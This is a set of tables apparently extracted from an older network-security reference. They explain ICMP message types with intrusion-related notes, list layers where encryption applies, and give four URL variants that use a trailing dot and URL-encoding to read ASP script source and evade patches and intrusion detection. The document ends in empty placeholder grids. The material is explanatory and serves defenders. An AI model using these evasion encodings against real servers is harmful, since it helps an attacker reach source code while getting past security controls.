	0	Net Unreachable ICMP_UNREACH_NET	Route configuration problem or incorrectly specified IP address. [more]
	1	Host Unreachable ICMP_UNREACH_HOST	It means that the router one hop before the desired host could not ARP the host.
	2	Protocol Unreachable ICMP_UNREACH_PROTOCOL	This means that the receiver of the packet does not have anything that recognizes the specified IP protocol of the packet. Key point: This is almost never seen on the wire in practice, and either indicates and intrusion or some massive configuration error.
	3	Port unreachable ICMP_UNREACH_PORT	The server tells the client that nobody is listening at the port the client attempted to contact. [more]
	4	Fragmentation Needed but DF set ICMP_UNREACH_NEEDFRAG	Important: If you are seeing these in your firewall reject logs, then you've misconfigured your firewall. You should allow this packet to pass through, otherwise your clients will see their TCP connections mysteriously hang. [more]
4	*	Source Quench ICMP_SOURCEQUENCH	Congestion on the Internet. Somebody could flood your network with these packets in an attempt to convince your machines to slow down transmitting data. [more]
5	*	Redirect ICMP_REDIRECT	Somebody is trying to redirect your default router. This could be from a hacker trying to execute a man-in-the-middle attack against you by causing you to route through their own machine. [RFC792]
8	*	Echo Request ICMP_ECHO Ping	Ping. [more]
9	*	Router Advertisement ICMP_ROUTERADVERT	There is exists a hack against Win9x and Solaris such that a hacker can DoS you by redirecting your default router. A neighboring hacker can also do a man-in-the-middle attack by directing you through his/her router. [RFC1256]
11	*	Time Exceeded In Transit ICMP_TIMXCEED	It means that a packet never reached its target because something timed out.
	0	TTL Exceeded ICMP_TIMXCEED_INTRANS	Router dropped the packet either because of a routing loop or maybe because of a traceroute. [more]
	1	Fragment reassembly timeout ICMP_TIMXCEED_REASS	The host dropped the packet because it didn't receive all the fragments. [more]
12	*	Parameter Problem	Something unusual is going on, and probably indicates an attack. [more]
13	*	Timestamp ICMP_TSTAMP	[RFC792]
14	*	Timestamp Reply ICMP_TSTAMPREPLY	[RFC792]

Payload	The data itself can be encrypted independent of the protocols used to transport it. For example, a typical use of PGP is to encrypt a message before sending via e-mail. All the e-mail programs and protocols are totally unaware that this has occurred.
Application Layer	Some applications have the ability to encrypt data automatically. For example, SMB can encrypt data as it goes across the wire
Transport Layer	SSL is essentially encryption at the transport layer.
Network Layer	IPsec provides encryption at the network layer, encrypting all the contents above IP, including the TCP and UDP headers themselves.

http://www.robertgraham.com/sample.asp	Normal URL
http://www.robertgraham.com/sample.asp.	Attempt to read script rather than executing it.
http://www.robertgraham.com/sample.asp%2E	URL-encoding in order to evade patch.
http://www.robertgraham.com/sample.%61sp%2E	Fruther URL-encoding in order to evade intrusion detection systems.

1	2	4	8	16	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---

1	2	4	8	16	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---